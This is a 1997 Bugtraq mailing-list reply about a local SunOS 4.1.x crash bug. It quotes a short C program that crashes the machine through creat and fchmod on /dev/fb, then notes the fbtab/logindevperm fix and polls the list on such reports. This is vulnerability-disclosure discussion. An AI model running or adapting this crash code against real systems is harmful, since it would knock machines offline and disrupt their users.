[4593] in bugtraq
Re: SunOS 4.1.x crash
daemon@ATHENA.MIT.EDU (Doug Hughes)
Tue May 27 18:28:00 1997
Date: Tue, 27 May 1997 12:32:17 -0500
Reply-To: Doug Hughes <Doug.Hughes@ENG.AUBURN.EDU>
From: Doug Hughes <Doug.Hughes@ENG.AUBURN.EDU>
To: BUGTRAQ@NETSPACE.ORG
In-Reply-To: <19970527165403.30122@llaic.univ-bpclermont.fr>
>I found the following three-liner to crash SunOS 4.1.x. It works on
>/dev/fb and /dev/audio on some machines; you need permission to open the
>device.
>
>main(int argc, char *argv[]) {
> int fd;
>
> fd = creat(argc < 2 ? "/dev/fb" : argv[1], 0755);
> if (fd < 0) perror("creat"), exit(1);
> fchmod(fd, 0755); /* BOOM */
>}
>
Another one easily fixed with fbtab and logindevperm.
It's interesting to see what havoc one caninflict on oneself, and these
should probably be fixed, but I'm sure we could find lots of little
niggling things that could be poked at devices that we own (keybd, framebuffer,
etc) that will crash the machine. The fix to all of these is rather
easy though (unless one wants to crash the machine he is sitting in front of,
for whatever reason - there are probably a few circumstances where this
might be useful to a cracker, but he would need physical access to begin
with)
Poll: Are there those out there that would like to continue receiving
announcements of these little crash things that are all easily fixed by
the same mechanism? (I'm curious - personally I'd like to see attention
focussed elsewhere)
-
____________________________________________________________________________
Doug Hughes Engineering Network Services
System/Net Admin Auburn University
doug@eng.auburn.edu
